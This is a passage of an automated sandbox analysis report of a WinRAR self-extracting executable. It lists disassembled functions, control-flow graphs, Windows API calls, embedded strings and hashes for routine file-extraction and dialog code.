              control_flow_graph 966 b8a5f4-b8a61f call b9e360 969 b8a691-b8a69a FindNextFileW 966->969 970 b8a621-b8a632 FindFirstFileW 966->970 971 b8a69c-b8a6aa GetLastError 969->971 972 b8a6b0-b8a6b2 969->972 973 b8a6b8-b8a75c call b8fe56 call b8bcfb call b90e19 * 3 970->973 974 b8a638-b8a64f call b8b66c 970->974 971->972 972->973 975 b8a761-b8a774 972->975 973->975 981 b8a66a-b8a673 GetLastError 974->981 982 b8a651-b8a668 FindFirstFileW 974->982 984 b8a684 981->984 985 b8a675-b8a678 981->985 982->973 982->981 986 b8a686-b8a68c 984->986 985->984 988 b8a67a-b8a67d 985->988 986->975 988->984 990 b8a67f-b8a682 988->990 990->986
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A692
              • GetLastError.KERNEL32(?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A69E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 9f6811cbc6a0a40070431e47cf28347b5ffe66b87b476c1b003dfeeef5cc9a34
              • Instruction ID: ab10d729abb08382f9c000fc7b214ceeb916f6baf922428b3f5645ab97d7b9ee
              • Opcode Fuzzy Hash: 9f6811cbc6a0a40070431e47cf28347b5ffe66b87b476c1b003dfeeef5cc9a34
              • Instruction Fuzzy Hash: 42418F76504645AFC720FF68C884ADAF7E8FF48340F040A6AF5A9D3250E774A954CB92
              Function 00BA753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002,00000000), ref: 00BA755E
              • TerminateProcess.KERNEL32(00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002,00000000), ref: 00BA7565
              • ExitProcess.KERNEL32 ref: 00BA7577
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: c1e9c25d18550ddb377cfafe608b7a77f714bd07b999944a26f72f8ac9822c9c
              • Instruction ID: 56d7704cf636e1fddda20081ed1c8705d755b7d655ebf5998c3923d4781b13c3
              • Opcode Fuzzy Hash: c1e9c25d18550ddb377cfafe608b7a77f714bd07b999944a26f72f8ac9822c9c
              • Instruction Fuzzy Hash: 17E04631448508AFCF11BF28CD08A483BA9EF12B41F448154F8058B222CF75DE42CB50
              Function 00B8857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 93b6510a01759ce8319109e3f0d2dbc81ecb8973ff657455fb4aeaf009b877d3
              • Instruction ID: eb7b2df874b064a76aa0c42570f229963c4b44dd6a8fb2c3c7afeaa1fb3e46ad
              • Opcode Fuzzy Hash: 93b6510a01759ce8319109e3f0d2dbc81ecb8973ff657455fb4aeaf009b877d3
              • Instruction Fuzzy Hash: E282F870904245AFDF25FF64C885BFABBE9EF05300F4841FAE959AB162DB315A44CB60
              Function 00B9AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B9AEE5
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-3617005944
              • Opcode ID: 686abc29fbdf015e352aa8917efb92b6f8edb331696b42b949f308b0703a4b92
              • Instruction ID: 0d222534c3d3de4b5857f46aad893abf08ef6c720f76fb20a999d9f29bcdd529
              • Opcode Fuzzy Hash: 686abc29fbdf015e352aa8917efb92b6f8edb331696b42b949f308b0703a4b92
              • Instruction Fuzzy Hash: 2142C471944254ABEF25ABA0AD8AFBE7BFCEB05704F0001E5F605A71E1CFB45944CB62
              Function 00B900CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 257 b900cf-b900ee call b9e360 GetModuleHandleW 260 b900f0-b90107 GetProcAddress 257->260 261 b90154-b903b2 257->261 264 b90109-b9011f 260->264 265 b90121-b90131 GetProcAddress 260->265 262 b903b8-b903c3 call ba70dd 261->262 263 b90484-b904b3 GetModuleFileNameW call b8bc85 call b8fe56 261->263 262->263 274 b903c9-b903fa GetModuleFileNameW CreateFileW 262->274 279 b904b5-b904bf call b8acf5 263->279 264->265 265->261 266 b90133-b90152 265->266 266->261 276 b90478-b9047f CloseHandle 274->276 277 b903fc-b9040a SetFilePointer 274->277 276->263 277->276 280 b9040c-b90429 ReadFile 277->280 285 b904cc 279->285 286 b904c1-b904c5 call b90085 279->286 280->276 281 b9042b-b90450 280->281 283 b9046d-b90476 call b8fbd8 281->283 283->276 294 b90452-b9046c call b90085 283->294 289 b904ce-b904d0 285->289 291 b904ca 286->291 292 b904f2-b90518 call b8bcfb GetFileAttributesW 289->292 293 b904d2-b904f0 CompareStringW 289->293 291->289 296 b9051a-b9051e 292->296 301 b90522 292->301 293->292 293->296 294->283 296->279 300 b90520 296->300 302 b90526-b90528 300->302 301->302 303 b9052a 302->303 304 b90560-b90562 302->304 307 b9052c-b90552 call b8bcfb GetFileAttributesW 303->307 305 b90568-b9057f call b8bccf call b8acf5 304->305 306 b9066f-b90679 304->306 317 b90581-b905e2 call b90085 * 2 call b8ddd1 call b8400a call b8ddd1 call b99f35 305->317 318 b905e7-b9061a call b8400a AllocConsole 305->318 312 b9055c 307->312 313 b90554-b90558 307->313 312->304 313->307 315 b9055a 313->315 315->304 324 b90667-b90669 ExitProcess 317->324 323 b9061c-b90661 GetCurrentProcessId AttachConsole call ba35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 00B900E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B900F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B90127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B903D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B903F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B90402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00BB3BA4,00000000), ref: 00B90421
              • CloseHandle.KERNEL32(00000000), ref: 00B90479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B9048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B904E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00B90510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B9054A
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • _swprintf.LIBCMT ref: 00B905BE
              • _swprintf.LIBCMT ref: 00B9060A
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • AllocConsole.KERNEL32 ref: 00B90612
              • GetCurrentProcessId.KERNEL32 ref: 00B9061C
              • AttachConsole.KERNEL32(00000000), ref: 00B90623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B90649
              • WriteConsoleW.KERNEL32(00000000), ref: 00B90650
              • Sleep.KERNEL32(00002710), ref: 00B9065B
              • FreeConsole.KERNEL32 ref: 00B90661
              • ExitProcess.KERNEL32 ref: 00B90669
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: bb2cc7ecab82be562ee8f1f770a5606e8be35dc3a0c74afabf6812871374c648
              • Instruction ID: 3c9a2abd73e35891330bedc908eda260a353b4a2088a3af84abfdc06a0cdb42a
              • Opcode Fuzzy Hash: bb2cc7ecab82be562ee8f1f770a5606e8be35dc3a0c74afabf6812871374c648
              • Instruction Fuzzy Hash: 1FD151B25583449FD730AF50D849BEFBAE8FF85B04F4009ADF58596250DBF09648CB62
              Function 00B9BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 406 b9bdf5-b9be0d call b9e28c call b9e360 411 b9ca90-b9ca9d 406->411 412 b9be13-b9be3d call b9aa36 406->412 412->411 415 b9be43-b9be48 412->415 416 b9be49-b9be57 415->416 417 b9be58-b9be6d call b9a6c7 416->417 420 b9be6f 417->420 421 b9be71-b9be86 call b917ac 420->421 424 b9be88-b9be8c 421->424 425 b9be93-b9be96 421->425 424->421 426 b9be8e 424->426 427 b9ca5c-b9ca87 call b9aa36 425->427 428 b9be9c 425->428 426->427 427->416 440 b9ca8d-b9ca8f 427->440 430 b9bea3-b9bea6 428->430 431 b9c132-b9c134 428->431 432 b9c115-b9c117 428->432 433 b9c074-b9c076 428->433 430->427 438 b9beac-b9bf06 call b99da4 call b8b965 call b8a49d call b8a5d7 call b870bf 430->438 431->427 435 b9c13a-b9c141 431->435 432->427 434 b9c11d-b9c12d SetWindowTextW 432->434 433->427 437 b9c07c-b9c088 433->437 434->427 435->427 439 b9c147-b9c160 435->439 441 b9c08a-b9c09b call ba7168 437->441 442 b9c09c-b9c0a1 437->442 492 b9c045-b9c05a call b8a52a 438->492 444 b9c168-b9c176 call ba35b3 439->444 445 b9c162 439->445 440->411 441->442 448 b9c0ab-b9c0b6 call b9ab9a 442->448 449 b9c0a3-b9c0a9 442->449 444->427 461 b9c17c-b9c185 444->461 445->444 453 b9c0bb-b9c0bd 448->453 449->453 458 b9c0c8-b9c0e8 call ba35b3 call ba35de 453->458 459 b9c0bf-b9c0c6 call ba35b3 453->459 480 b9c0ea-b9c0f1 458->480 481 b9c101-b9c103 458->481 459->458 466 b9c1ae-b9c1b1 461->466 467 b9c187-b9c18b 461->467 472 b9c1b7-b9c1ba 466->472 473 b9c296-b9c2a4 call b8fe56 466->473 467->466 470 b9c18d-b9c195 467->470 470->427 478 b9c19b-b9c1a9 call b8fe56 470->478 474 b9c1bc-b9c1c1 472->474 475 b9c1c7-b9c1e2 472->475 489 b9c2a6-b9c2ba call ba17cb 473->489 474->473 474->475 493 b9c22c-b9c233 475->493 494 b9c1e4-b9c21e 475->494 478->489 486 b9c0f8-b9c100 call ba7168 480->486 487 b9c0f3-b9c0f5 480->487 481->427 488 b9c109-b9c110 call ba35ce 481->488 486->481 487->486 488->427 508 b9c2bc-b9c2c0 489->508 509 b9c2c7-b9c318 call b8fe56 call b9a8d0 GetDlgItem SetWindowTextW SendMessageW call ba35e9 489->509 510 b9bf0b-b9bf1f SetFileAttributesW 492->510 511 b9c060-b9c06f call b8a4b3 492->511 499 b9c261-b9c284 call ba35b3 * 2 493->499 500 b9c235-b9c24d call ba35b3 493->500 529 b9c220 494->529 530 b9c222-b9c224 494->530 499->489 534 b9c286-b9c294 call b8fe2e 499->534 500->499 522 b9c24f-b9c25c call b8fe2e 500->522 508->509 512 b9c2c2-b9c2c4 508->512 540 b9c31d-b9c321 509->540 516 b9bfc5-b9bfd5 GetFileAttributesW 510->516 517 b9bf25-b9bf58 call b8b4f7 call b8b207 call ba35b3 510->517 511->427 512->509 516->492 527 b9bfd7-b9bfe6 DeleteFileW 516->527 549 b9bf6b-b9bf79 call b8b925 517->549 550 b9bf5a-b9bf69 call ba35b3 517->550 522->499 527->492 533 b9bfe8-b9bfeb 527->533 529->530 530->493 537 b9bfef-b9c01b call b8400a GetFileAttributesW 533->537 534->489 547 b9bfed-b9bfee 537->547 548 b9c01d-b9c033 MoveFileW 537->548 540->427 544 b9c327-b9c33b SendMessageW 540->544 544->427 547->537 548->492 551 b9c035-b9c03f MoveFileExW 548->551 549->511 556 b9bf7f-b9bfbe call ba35b3 call b9f350 549->556 550->549 550->556 551->492 556->516
              APIs
              • __EH_prolog.LIBCMT ref: 00B9BDFA
                • Part of subcall function 00B9AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B9AAFE
              • SetWindowTextW.USER32(?,?), ref: 00B9C127
              • _wcsrchr.LIBVCRUNTIME ref: 00B9C2B1
              • GetDlgItem.USER32(?,00000066), ref: 00B9C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 00B9C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,00BCA472), ref: 00B9C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B9C335
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 19f38e1c5f3f0d19817829503ab90738639e01b24d267f8799fe01bf854af935
              • Instruction ID: f9b7dcb3b904049320985a675ccd8995a9891ce8c5e9fc79901768a83155d3fb
              • Opcode Fuzzy Hash: 19f38e1c5f3f0d19817829503ab90738639e01b24d267f8799fe01bf854af935
              • Instruction Fuzzy Hash: 40E14B72D04219AADF25EBA4DC85EEE77FCEF19711F0040F6F509A30A1EB749A848B50
              Function 00B8D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 b8d341-b8d378 call b9e28c call b9e360 call ba15e8 568 b8d37a-b8d3a9 GetModuleFileNameW call b8bc85 call b8fe2e 561->568 569 b8d3ab-b8d3b4 call b8fe56 561->569 573 b8d3b9-b8d3dd call b89619 call b899b0 568->573 569->573 580 b8d7a0-b8d7a6 call b89653 573->580 581 b8d3e3-b8d3eb 573->581 585 b8d7ab-b8d7bb 580->585 582 b8d409-b8d438 call ba5a90 * 2 581->582 583 b8d3ed-b8d405 call b93781 * 2 581->583 595 b8d43b-b8d43e 582->595 594 b8d407 583->594 594->582 596 b8d56c-b8d58f call b89d30 call ba35d3 595->596 597 b8d444-b8d44a call b89e40 595->597 596->580 606 b8d595-b8d5b0 call b89bf0 596->606 601 b8d44f-b8d476 call b89bf0 597->601 607 b8d47c-b8d484 601->607 608 b8d535-b8d538 601->608 618 b8d5b9-b8d5cc call ba35d3 606->618 619 b8d5b2-b8d5b7 606->619 610 b8d4af-b8d4ba 607->610 611 b8d486-b8d48e 607->611 612 b8d53b-b8d55d call b89d30 608->612 615 b8d4bc-b8d4c8 610->615 616 b8d4e5-b8d4ed 610->616 611->610 614 b8d490-b8d4aa call ba5ec0 611->614 612->595 631 b8d563-b8d566 612->631 634 b8d52b-b8d533 614->634 635 b8d4ac 614->635 615->616 621 b8d4ca-b8d4cf 615->621 623 b8d519-b8d51d 616->623 624 b8d4ef-b8d4f7 616->624 618->580 641 b8d5d2-b8d5ee call b9137a call ba35ce 618->641 627 b8d5f1-b8d5f8 619->627 621->616 630 b8d4d1-b8d4e3 call ba5808 621->630 623->608 626 b8d51f-b8d522 623->626 624->623 625 b8d4f9-b8d513 call ba5ec0 624->625 625->580 625->623 626->607 637 b8d5fa 627->637 638 b8d5fc-b8d625 call b8fdfb call ba35d3 627->638 630->616 645 b8d527 630->645 631->580 631->596 634->612 635->610 637->638 650 b8d633-b8d649 638->650 651 b8d627-b8d62e call ba35ce 638->651 641->627 645->634 654 b8d64f-b8d65d 650->654 655 b8d731-b8d757 call b8ce72 call ba35ce * 2 650->655 651->580 657 b8d664-b8d669 654->657 690 b8d759-b8d76f call b93781 * 2 655->690 691 b8d771-b8d79d call ba5a90 * 2 655->691 659 b8d97c-b8d984 657->659 660 b8d66f-b8d678 657->660 665 b8d98a-b8d98e 659->665 666 b8d72b-b8d72e 659->666 663 b8d67a-b8d67e 660->663 664 b8d684-b8d68b 660->664 663->659 663->664 668 b8d880-b8d891 call b8fcbf 664->668 669 b8d691-b8d6b6 664->669 670 b8d9de-b8d9e4 665->670 671 b8d990-b8d996 665->671 666->655 692 b8d976-b8d979 668->692 693 b8d897-b8d8c0 call b8fe56 call ba5885 668->693 678 b8d6b9-b8d6de call ba35b3 call ba5808 669->678 676 b8da0a-b8da2a call b8ce72 670->676 677 b8d9e6-b8d9ec 670->677 672 b8d99c-b8d9a3 671->672 673 b8d722-b8d725 671->673 679 b8d9ca 672->679 680 b8d9a5-b8d9a8 672->680 673->657 673->666 699 b8da02-b8da05 676->699 677->676 684 b8d9ee-b8d9f4 677->684 709 b8d6e0-b8d6ea 678->709 710 b8d6f6 678->710 694 b8d9cc-b8d9d9 679->694 687 b8d9aa-b8d9ad 680->687 688 b8d9c6-b8d9c8 680->688 684->673 695 b8d9fa-b8da01 684->695 697 b8d9af-b8d9b2 687->697 698 b8d9c2-b8d9c4 687->698 688->694 690->691 691->580 692->659 693->692 721 b8d8c6-b8d93c call b91596 call b8fdfb call b8fdd4 call b8fdfb call ba58d9 693->721 694->673 695->699 704 b8d9be-b8d9c0 697->704 705 b8d9b4-b8d9b8 697->705 698->694 704->694 705->684 711 b8d9ba-b8d9bc 705->711 709->710 715 b8d6ec-b8d6f4 709->715 716 b8d6f9-b8d6fd 710->716 711->694 715->716 716->678 720 b8d6ff-b8d706 716->720 722 b8d70c-b8d71a call b8fdfb 720->722 723 b8d7be-b8d7c1 720->723 754 b8d94a-b8d95f 721->754 755 b8d93e-b8d947 721->755 730 b8d71f 722->730 723->668 725 b8d7c7-b8d7ce 723->725 728 b8d7d0-b8d7d4 725->728 729 b8d7d6-b8d7d7 725->729 728->729 733 b8d7d9-b8d7e7 728->733 729->725 730->673 735 b8d808-b8d830 call b91596 733->735 736 b8d7e9-b8d7ec 733->736 744 b8d832-b8d84e call ba35e9 735->744 745 b8d853-b8d85b 735->745 738 b8d7ee-b8d803 736->738 739 b8d805 736->739 738->736 738->739 739->735 744->730 746 b8d85d 745->746 747 b8d862-b8d87b call b8dd6b 745->747 746->747 747->730 756 b8d960-b8d967 754->756 755->754 757 b8d969-b8d96d 756->757 758 b8d973-b8d974 756->758 757->730 757->758 758->756
              APIs
              • __EH_prolog.LIBCMT ref: 00B8D346
              • _wcschr.LIBVCRUNTIME ref: 00B8D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00B8D328,?), ref: 00B8D382
              • __fprintf_l.LIBCMT ref: 00B8D873
                • Part of subcall function 00B9137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8B652,00000000,?,?,?,00010442), ref: 00B91396
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: 204db174c050294e356954bac5a3c3c7e3593c79ee921bb303cc461ef3a17d63
              • Instruction ID: 5eb4d9edcfb2784ffa8168d576a9c88ef1508bcdedee45a5ed9b37366313dac1
              • Opcode Fuzzy Hash: 204db174c050294e356954bac5a3c3c7e3593c79ee921bb303cc461ef3a17d63
              • Instruction Fuzzy Hash: 7E1290B19002199ADF24FFA4DC81AEEB7F5EF14700F5445EAE506A71E1EB709E40CB64
              Function 00B9CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00B9AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
                • Part of subcall function 00B9AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
                • Part of subcall function 00B9AC74: IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
                • Part of subcall function 00B9AC74: TranslateMessage.USER32(?), ref: 00B9ACB8
                • Part of subcall function 00B9AC74: DispatchMessageW.USER32(?), ref: 00B9ACC2
              • GetDlgItem.USER32(00000068,00BDECB0), ref: 00B9CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00B9A632,00000001,?,?,00B9AECB,00BB4F88,00BDECB0), ref: 00B9CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,00BB35B4), ref: 00B9CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,00BB431C), ref: 00B9CC76
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: b9ee30f9026bc6f5d64ca10394c1aad4f29edfbb7996cdd8af2a308f74e08754
              • Instruction ID: e5ffd4aa4c10c4fc3f8bdb4ca39d7c54744f0621659c4a2f381f88c8b187ead7
